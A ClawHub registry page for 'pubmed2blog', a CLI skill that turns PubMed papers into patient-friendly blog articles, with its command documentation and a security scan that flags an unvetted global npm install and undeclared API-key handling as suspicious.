ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

pubmed2blog

v1.0.0

Convert PubMed research papers into SEO-optimized, patient-friendly healthcare blog articles using a streamlined discover-extract-generate pipeline.

0· 695·1 current·1 all-time
byHolic@holic101
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
Name, description, and CLI commands (discover/extract/generate/pipeline) align with the stated purpose of turning PubMed papers into blog articles. However the SKILL.md advertises an 'init' step for API keys and 'Supports Anthropic, OpenAI, and Z.AI providers' but the registry metadata declares no required credentials or primaryEnv — that's an unexplained discrepancy.
Instruction Scope
Instructions are narrowly scoped to running the pubmed2blog CLI and optionally scheduling via cron. They do not instruct reading unrelated system files or exfiltrating data. The only scope creep is the 'init' interactive setup (which implies collecting/storing API keys) and a recommendation to 'schedule via cron' which could imply system modification if followed — the SKILL.md doesn't show where credentials/preferences are stored or what providers those API keys are for.
!
Install Mechanism
Installation is an npm global install (npm install -g pubmed2blog). That's a public-registry install with install-time code execution risk (postinstall scripts) and it comes from an unknown source (no homepage, no repository URL provided). Instruction-only skill + global npm install is moderate risk without provenance or package review.
!
Credentials
The SKILL.md implies use of API keys and support for multiple LLM providers, but the skill metadata lists no required env vars or primary credential. This mismatch means the skill may prompt the user for secrets at init or expect them to be provided at runtime without declaring them up-front — a transparency issue and potential risk.
Persistence & Privilege
The skill does not request permanent inclusion (always:false) and is user-invocable. It does suggest saving generated articles and scheduling via cron, but it does not itself declare writing to system-wide config or changing other skills. No excessive privilege requested in metadata.
What to consider before installing
Before installing, verify the npm package's provenance: check the package page/registry (author, repository, recent publish history, and open-source code). Avoid global installs until you trust the package; prefer to install into a container or VM first. Ask the publisher which API keys the tool needs and where they are stored (local config file, OS keychain, or remote). Inspect the package's postinstall scripts and source code for network calls or unexpected filesystem writes. If you must use it in production, pin a known-good version, run npm audit, and consider running it with least privilege (no broad credentials present). If you want help reviewing the package's repository or package.json before running npm install -g, provide the package URL or tarball.

Like a lobster shell, security has layers — review code before you run it.

latestvk9770gg5nvcxzcvhss4mmbxzxn815hsz
695downloads
0stars
1versions
Updated 7h ago
v1.0.0
MIT-0
Holic@holic101
latest
Download

pubmed2blog Skill

This skill provides access to the pubmed2blog CLI tool for converting PubMed papers into blog articles.

Commands

discover

Search PubMed for relevant studies ranked by blog suitability.

pubmed2blog discover "cardiovascular prevention"
pubmed2blog discover "sleep quality" --days 30 --tier tier1,tier2

extract

Fetch full paper details from PubMed.

pubmed2blog extract 39847521
pubmed2blog extract 39847521 --json

generate

Generate a blog article from a PubMed paper.

pubmed2blog generate 39847521 --type research-explainer
pubmed2blog generate 39847521 --type patient-facing --lang en,de --save

pipeline

Full pipeline: discover + extract + generate.

pubmed2blog pipeline "sleep quality" --top 3 --save

init

Interactive setup for API keys and preferences.

pubmed2blog init

Article Types

  • research-explainer: Study findings for lay audience
  • patient-facing: Accessible, no jargon
  • differentiation: "Why we don't offer X"
  • service-connection: Connect findings to services

Agent Usage

When using this skill as an agent:

  1. Run pubmed2blog discover <keyword> to find relevant papers
  2. Use pubmed2blog extract <pmid> to get full details
  3. Generate with pubmed2blog generate <pmid> --type <type> --save
  4. Deliver results to user in chat
  5. Schedule via cron for regular content generation

Setup

npm install -g pubmed2blog
pubmed2blog init

Supports Anthropic, OpenAI, and Z.AI providers.

Comments

Loading comments...